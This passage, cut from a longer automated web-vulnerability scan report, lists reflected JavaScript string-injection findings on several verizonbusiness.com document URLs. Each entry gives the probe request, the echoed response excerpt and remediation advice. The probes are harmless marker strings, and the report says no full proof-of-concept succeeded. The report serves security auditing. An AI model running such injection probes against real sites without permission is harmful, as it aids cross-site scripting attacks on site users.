var request='/resources11aee';288c8280f16/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.808. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4ecd"%3b918dfb6a6af was submitted in the REST URL parameter 1. This input was echoed as c4ecd";918dfb6a6af in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc4ecd"%3b918dfb6a6af/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:19 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40708
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesc4ecd";918dfb6a6af/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FO
...[SNIP]...

1.809. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 334ef"%3b1a323b258fe was submitted in the REST URL parameter 2. This input was echoed as 334ef";1a323b258fe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/newsletters334ef"%3b1a323b258fe/most-clouds-obstruct-your-vision_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:40 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40318
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/newsletters334ef";1a323b258fe/most-clouds-obstruct-your-vision_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATIO
...[SNIP]...

1.810. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aed21'%3b3cbba4a05b3 was submitted in the REST URL parameter 2. This input was echoed as aed21';3cbba4a05b3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/newslettersaed21'%3b3cbba4a05b3/most-clouds-obstruct-your-vision_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:47 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40318
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/newslettersaed21';3cbba4a05b3/most-clouds-obstruct-your-vision_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.811. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b072"%3b710483d65d5 was submitted in the REST URL parameter 3. This input was echoed as 6b072";710483d65d5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf6b072"%3b710483d65d5 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40320
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf6b072";710483d65d5";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.812. http://www.verizonbusiness.com/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb3de'%3bb1d26038fdb was submitted in the REST URL parameter 3. This input was echoed as bb3de';b1d26038fdb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdfbb3de'%3bb1d26038fdb HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40318
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/newsletters/most-clouds-obstruct-your-vision_en_xg.pdfbb3de';b1d26038fdb'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.813. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/reports/rp_2010-data-breach-report_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1abe"%3b61de3a89f24 was submitted in the REST URL parameter 1. This input was echoed as c1abe";61de3a89f24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc1abe"%3b61de3a89f24/reports/rp_2010-data-breach-report_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40688
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesc1abe";61de3a89f24/reports/rp_2010-data-breach-report_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDAT
...[SNIP]...

1.814. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/reports/rp_2010-data-breach-report_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4669'%3bfc7dae2fdb5 was submitted in the REST URL parameter 1. This input was echoed as c4669';fc7dae2fdb5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc4669'%3bfc7dae2fdb5/reports/rp_2010-data-breach-report_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40688
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesc4669';fc7dae2fdb5/reports/rp_2010-data-breach-report_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.815. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/reports/rp_2010-data-breach-report_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa805'%3b819e712108d was submitted in the REST URL parameter 2. This input was echoed as aa805';819e712108d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/reportsaa805'%3b819e712108d/rp_2010-data-breach-report_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40298
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/reportsaa805';819e712108d/rp_2010-data-breach-report_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.816. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/reports/rp_2010-data-breach-report_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f655c"%3b6abbaccf2fd was submitted in the REST URL parameter 2. This input was echoed as f655c";6abbaccf2fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/reportsf655c"%3b6abbaccf2fd/rp_2010-data-breach-report_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:42 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40300
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/reportsf655c";6abbaccf2fd/rp_2010-data-breach-report_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.817. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/reports/rp_2010-data-breach-report_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2aa6'%3bae41c518bd8 was submitted in the REST URL parameter 3. This input was echoed as c2aa6';ae41c518bd8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/reports/rp_2010-data-breach-report_en_xg.pdfc2aa6'%3bae41c518bd8 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:12 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40298
Date: Wed, 17 Nov 2010 00:05:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/reports/rp_2010-data-breach-report_en_xg.pdfc2aa6';ae41c518bd8'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.818. http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/reports/rp_2010-data-breach-report_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4eef"%3b2dea37016bb was submitted in the REST URL parameter 3. This input was echoed as e4eef";2dea37016bb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/reports/rp_2010-data-breach-report_en_xg.pdfe4eef"%3b2dea37016bb HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:59 GMT
Content-Type: text/html
Content-Length: 40298
Date: Wed, 17 Nov 2010 00:04:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/reports/rp_2010-data-breach-report_en_xg.pdfe4eef";2dea37016bb";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.819. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73364'%3b4285cf2cc2a was submitted in the REST URL parameter 1. This input was echoed as 73364';4285cf2cc2a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources73364'%3b4285cf2cc2a/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40704
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources73364';4285cf2cc2a/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.820. http://www.verizonbusiness.com/resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/solutionsbriefs/sb_cloud-computing-program_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9b44"%3bee3423c5215 was submitted in the REST URL parameter 1. This input was echoed as e9b44";ee3423c5215 in the application's response.

